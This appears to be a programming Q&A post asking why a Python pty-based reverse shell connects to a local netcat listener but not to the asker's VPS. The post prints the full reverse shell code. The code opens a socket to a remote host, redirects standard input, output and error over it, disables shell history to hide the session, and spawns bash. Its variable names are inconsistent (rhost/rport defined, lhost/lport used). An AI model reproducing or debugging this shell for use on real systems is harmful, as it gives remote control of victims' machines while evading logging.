# pty based reverse shell in Python

Tags: linux, python-3.x, networking, pty

I am trying to build a pty based reverse shell using python.
Here is my code

```
import os
import pty
import socket

rhost = "127.0.0.1" #Remote host address
rport = 4444 # XXX: CHANGEME

def main():
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((lhost, lport))
    print("connected")
    os.dup2(s.fileno(),0)
    os.dup2(s.fileno(),1)
    os.dup2(s.fileno(),2)
    os.putenv("HISTFILE",'/dev/null')
    pty.spawn("/bin/bash")
    s.close()

if __name__ == "__main__":
    main()
```

When I am trying to use this shell with a listener running on my own system with a command like `nc -4444` then I am getting a shell.
but when I try to change the host address to the IP of my VPS and use the same command to get a listener on port 4444 then I am not getting the shell back.For some reason, it's only working when I run both the client and server on my own system.